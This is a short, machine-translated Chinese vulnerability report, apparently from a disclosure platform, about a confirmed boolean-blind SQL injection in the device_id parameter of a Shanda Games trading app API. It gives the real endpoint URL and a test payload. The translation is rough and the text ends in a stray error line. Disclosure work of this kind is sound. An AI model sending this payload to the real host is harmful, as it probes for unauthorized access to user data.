漏洞标题 在盛大游戏的某个应用程序中有SQL注入（涉及78W +用户数据） 相关制造商 盛大的比赛 漏洞作者 过路人 提交时间 2016-05-03 06: 28 公共时间 2016-06-18 10: 10 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标：盛大游戏G购买并销售Android APP 测试在以下地方发现SQL注入:(注入参数device_id，布尔盲） http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump&params={'app_version':'193'，'device_id':'A0000038518D0C-d3ff252e6543971a'} 有效载荷： http://ymm123.sdo.com/api/tradeapi/config?src_code=10&method=indexWebViewJump&params={'app_version':'193'，'device_id':'A0000038518D0C-d3ff252e6543971a'和'a'='a'} 从对等方接收数据时失败